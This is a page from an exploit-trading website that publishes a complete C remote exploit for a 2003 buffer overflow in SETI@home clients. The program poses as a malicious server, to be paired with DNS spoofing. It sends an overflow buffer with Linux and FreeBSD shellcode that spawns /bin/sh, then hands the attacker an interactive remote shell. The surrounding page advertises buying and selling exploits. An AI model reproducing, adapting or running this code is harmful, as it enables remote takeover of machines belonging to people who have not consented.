[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

SETI@home Clients Buffer Overflow Exploit

Author
zillion
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-8294
Category
remote exploits
Date add
07-04-2003
Platform
linux
=========================================
SETI@home Clients Buffer Overflow Exploit
=========================================

/*
   Seti@Home exploit by zillion[at]safemode.org (2003/01/07)

   Credits for the vulnerability go to: SkyLined <SkyLined@edup.tudelft.nl>
   http://spoor12.edup.tudelft.nl/SkyLined%20v4.2/?Advisories/Seti@home

   Use this exploit in combination with a DNS spoofing utility such as the one
   provided in the Dsniff package. http://naughty.monkey.org/~dugsong/dsniff/

*/

#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <stdio.h>

#define NOP 0x41
#define EXEC "TERM=xterm; export TERM=xterm;exec /bin/sh -i"
#define EXEC2 "id;uname -a;"

char linux_shellcode[] =

   /* dup */
   "\x31\xc9\x31\xc0\x31\xdb\xb3\x04\xb0\x3f\xcd\x80\xfe\xc1\xb0"
   "\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80"


   /* execve /bin/sh */
   "\x31\xdb\x31\xc9\xf7\xe3\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
   "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";


char freebsd_shellcode[] =

  "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb1\x03\xbb\xff\xff\xff\xff"
  "\xb2\x04\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01\x75\xf3"

  "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
  "\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
  "\xb0\x3b\x50\xcd\x80";

char static_crap[] =

   "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

struct target
{
  int   num;
  char *description;
  char *versions;
  char *type;
  char *shellcode;
  long  retaddress;
  int   bufsize;
  int   offset;
  int   junk;
};

struct target targets[] =
{
  {0,  "Linux  2.2.* ", "3.03.i386      linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode,
   0xbffff420, 520, 500, 0},
  {1,  "Linux  2.4.* ", "3.03 i386/i686 linux-gnu-gnulibc2.1 ", "Packet retr mode", linux_shellcode,
   0xbffff390, 520, 500, 1},
  {2,  "Linux  2.*   ", "3.03.i386/i686 linux-gnulibc1-static", "Packet retr mode", linux_shellcode,
  0xbffff448, 520, 500, 1},
  {3,  "All above    ", "3.03.i386      linux*               ", "Packet retr mode", linux_shellcode,
   0xbffff448, 520, 300, 1},
  {4,  "FreeBSD      ", "3.03.i386      FreeBSD-2.2.8        ", "Packet retr mode", freebsd_shellcode,
 0x0004956c, 520, 1, 2},
  {5, NULL, NULL, NULL, NULL, 0, 0, 0}
};

int open_socket(int port)
{

  int sock,fd;
  struct sockaddr_in cliAddr, servAddr;

  sock = socket(AF_INET, SOCK_STREAM, 0);
   if(sock<0) {
    printf("Error: Cannot open socket \n");
    exit(1);
  }

  /* bind server port */
  servAddr.sin_family = AF_INET;
  servAddr.sin_addr.s_addr = htonl(INADDR_ANY);
  servAddr.sin_port = htons(port);

  if(bind(sock, (struct sockaddr *) &servAddr, sizeof(servAddr))<0) {
    printf("Error: Cannot bind to port %d \n",port);
    exit(1);
  }

  listen(sock,5);
  fd=accept(sock,0,0);

  return fd;
}

void usage(char *progname) {

  int i;

  printf("\n---------------------------------------------------");
  printf("\n  *- Seti@Home remote exploit by zillion (s-m0de) -*");
  printf("\n---------------------------------------------------");
  printf("\n\nDefault      : %s  -h <target host>",progname);
  printf("\nTarget       : %s  -t <number>",progname);
  printf("\nOffset       : %s  -o <offset>",progname);
  printf("\nPort         : %s  -p <port>\n",progname);
  printf("\nDebug        : %s  -d \n",progname);

  printf("\nAvailable types:\n");
  printf("---------------------------------------------------\n");
  for(i = 0; targets[i].description; i++) {
    fprintf(stdout, "%d\t%s\t%s\t%s\n", targets[i].num, targets[i].description,targets[i].
versions,targets[i].type);
  }
  printf("\n\n");
  exit(0);
}

int sh(int sockfd) {
  char snd[1024], rcv[1024];
  fd_set rset;
  int maxfd, n,test;

  strcpy(snd, EXEC "\n");
  write(sockfd, snd, strlen(snd));

  read(sockfd,rcv,7);
  fflush(stdout);

  strcpy(snd, EXEC2 "\n");
  write(sockfd, snd, strlen(snd));

  /* Main command loop */
  for (;;) {
    FD_SET(fileno(stdin), &rset);
    FD_SET(sockfd, &rset);

    maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
    select(maxfd, &rset, NULL, NULL, NULL);

    if (FD_ISSET(fileno(stdin), &rset)) {
      bzero(snd, sizeof(snd));
      fgets(snd, sizeof(snd)-2, stdin);
      write(sockfd, snd, strlen(snd));
    }

    if (FD_ISSET(sockfd, &rset)) {
      bzero(rcv, sizeof(rcv));

      if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
	/* exit */
	return 0;
      }

      if (n < 0) {
	perror("read");
	return 1;
      }

      fputs(rcv, stdout);
      fflush(stdout);
    }
  } /* for(;;) */
}


int main(int argc, char **argv){

  char *buffer,*tmp;
  long retaddress;
  char rcv[200];
  int fd,i,arg,debug=0,type=0,port=80,offset=250;

  if(argc < 2) { usage(argv[0]); }

  while ((arg = getopt (argc, argv, "dh:o:l:p:t:")) != -1){
    switch (arg){
    case 'd':
	debug = 1;
	break;
    case 'o':
      offset = atoi(optarg);
      break;
    case 'p':
      port = atoi(optarg);
      break;
    case 't':
      type = atoi(optarg);
      break;
    default :
      usage(argv[0]);
    }
  }

  if((targets[type].retaddress) != 0) {
    buffer = (char *)malloc((targets[type].bufsize));

    /* some junk may be required to counter buffer manipulation */

    if(targets[type].junk == 1) {

    tmp = (char *)malloc(strlen(static_crap) + strlen(targets[type].shellcode));

    strcpy(tmp,targets[type].shellcode);
    strcat(tmp,static_crap);

    targets[type].shellcode = tmp;

    }

    memset(buffer,NOP,targets[type].bufsize);
    memcpy(buffer + (targets[type].bufsize) - (strlen(targets[type].shellcode) + 8) ,targets[type].
shellcode,strlen(targets[type].shellcode));

    /* Overwrite EBP and EIP */
    *(long *)&buffer[(targets[type].bufsize) - 8]  = (targets[type].retaddress - targets[type].offset);


    // If freebsd we need to place a value without 00 in ebp

    if(type == 4) {
       *(long *)&buffer[(targets[type].bufsize) - 8]  = 0xbfbff654;
    }

    *(long *)&buffer[(targets[type].bufsize) - 4]  = (targets[type].retaddress - targets[type].offset);

    /* Uncomment to overwrite eip and ebp with 41414141 */
    if(debug == 1) {
    *(long *)&buffer[(targets[type].bufsize) - 8]  = 0x41414141;
    *(long *)&buffer[(targets[type].bufsize) - 4]  = 0x41414141;
    }
  }

  fd = open_socket(port);

  write(fd,buffer,strlen(buffer));
  write(fd,"\n",1);
  write(fd,"\n",1);

  sleep(1);
  sh(fd);

  close(fd);
  return 0;

}


 

#  0day.today [2024-11-16]  #
0day Today Exploit Database buy and sell exploits type (local, remote, DoS, PoC, etc.)
Send all submissions to mr.inj3ct0r[at]gmail.com
Copyright © 2008-2024 0day Today Team